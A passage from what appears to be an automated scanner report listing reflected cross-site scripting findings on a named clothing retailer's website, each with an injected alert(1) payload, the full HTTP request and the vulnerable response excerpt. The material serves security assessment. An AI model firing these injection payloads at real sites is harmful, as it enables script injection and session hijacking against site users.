GET /men/trousers/?c177f"-alert(1)-"7e003bc6dd=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70388"-alert(1)-"5b48da15cf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men70388"-alert(1)-"5b48da15cf0/woven-shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:02:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=be02l2afv72o2hgpi89r2t6k21; expires=Tue, 09-Nov-2010 17:02:04 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/men70388"-alert(1)-"5b48da15cf0/woven-shirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57173"-alert(1)-"36554d3b526 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/woven-shirts57173"-alert(1)-"36554d3b526/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:02:33 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=ielk38p1cdvnm9vrm5hl46edf1; expires=Tue, 09-Nov-2010 17:02:33 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/men/woven-shirts57173"-alert(1)-"36554d3b526/"); //]]> ...[SNIP]...
1.231. http://www.fredperry.com/men/woven-shirts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/men/woven-shirts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8afd8"-alert(1)-"8bd75d8fddd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/woven-shirts/?8afd8"-alert(1)-"8bd75d8fddd=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6c55"-alert(1)-"c7ef5670682 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /productinfoa6c55"-alert(1)-"c7ef5670682/clothingsizes/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:24:32 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=4dk5d5fdmk3eqt52kduntndmk1; expires=Tue, 09-Nov-2010 17:24:32 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29361
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/productinfoa6c55"-alert(1)-"c7ef5670682/clothingsizes/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5c47"-alert(1)-"0dd4d3a7fb3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /productinfo/clothingsizesd5c47"-alert(1)-"0dd4d3a7fb3/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:24:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=9bdq06ni08c4g2tn7li98can80; expires=Tue, 09-Nov-2010 17:24:52 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29361
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/productinfo/clothingsizesd5c47"-alert(1)-"0dd4d3a7fb3/"); //]]> ...[SNIP]...
1.234. http://www.fredperry.com/productinfo/clothingsizes/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/productinfo/clothingsizes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 935de"-alert(1)-"65c96b3a2a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /productinfo/clothingsizes/?935de"-alert(1)-"65c96b3a2a8=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8766a"-alert(1)-"5e40dafcba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /productinfo8766a"-alert(1)-"5e40dafcba/footwearsizes/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:29 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=g1a2987226st1p04jpl19bp5o7; expires=Tue, 09-Nov-2010 17:20:29 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29360
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/productinfo8766a"-alert(1)-"5e40dafcba/footwearsizes/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e65d7"-alert(1)-"854115540de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /productinfo/footwearsizese65d7"-alert(1)-"854115540de/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=lb7d9b5603smg4kjol3qn871u6; expires=Tue, 09-Nov-2010 17:20:54 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29361
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/productinfo/footwearsizese65d7"-alert(1)-"854115540de/"); //]]> ...[SNIP]...
1.237. http://www.fredperry.com/productinfo/footwearsizes/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/productinfo/footwearsizes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb3f0"-alert(1)-"7841aac267f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /productinfo/footwearsizes/?cb3f0"-alert(1)-"7841aac267f=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41bd1"-alert(1)-"d86befb387e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /productinfo41bd1"-alert(1)-"d86befb387e/garmentcare/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:19:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=sl5ve9h94p1gn2rpouag2sh9s7; expires=Tue, 09-Nov-2010 17:19:46 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/productinfo41bd1"-alert(1)-"d86befb387e/garmentcare/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46cd0"-alert(1)-"28805937ef9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /productinfo/garmentcare46cd0"-alert(1)-"28805937ef9/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:09 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=3ccgtno5td8a3ftph0l9no5fr4; expires=Tue, 09-Nov-2010 17:20:09 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/productinfo/garmentcare46cd0"-alert(1)-"28805937ef9/"); //]]> ...[SNIP]...
1.240. http://www.fredperry.com/productinfo/garmentcare/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/productinfo/garmentcare/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a3c9"-alert(1)-"a1e63e7882e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /productinfo/garmentcare/?9a3c9"-alert(1)-"a1e63e7882e=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5db9"-alert(1)-"cbfb29d8f4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /saleb5db9"-alert(1)-"cbfb29d8f4b/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:22:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=916ls611rg8chlttk61e4d3rq3; expires=Tue, 09-Nov-2010 17:22:28 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29340
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/saleb5db9"-alert(1)-"cbfb29d8f4b/"); //]]> ...[SNIP]...
1.242. http://www.fredperry.com/sale/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/sale/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62888"-alert(1)-"b62cca0ff19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sale/?62888"-alert(1)-"b62cca0ff19=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b770"-alert(1)-"c5aafd3c260 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shops5b770"-alert(1)-"c5aafd3c260/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:22:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=7j4qaa56qrrdappj2bqaoq9jj2; expires=Tue, 09-Nov-2010 17:22:10 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29341
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/shops5b770"-alert(1)-"c5aafd3c260/"); //]]> ...[SNIP]...
1.244. http://www.fredperry.com/shops/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/shops/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1313"-alert(1)-"76dcfd4c4ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shops/?c1313"-alert(1)-"76dcfd4c4ee=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92156"-alert(1)-"81e165d4a2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /site-map92156"-alert(1)-"81e165d4a2d/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:25:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=qo6aq5frbvf38upse3suim6k05; expires=Tue, 09-Nov-2010 17:25:04 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/site-map92156"-alert(1)-"81e165d4a2d/"); //]]> ...[SNIP]...
1.246. http://www.fredperry.com/site-map/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/site-map/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79ccb"-alert(1)-"2a6cc699b53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
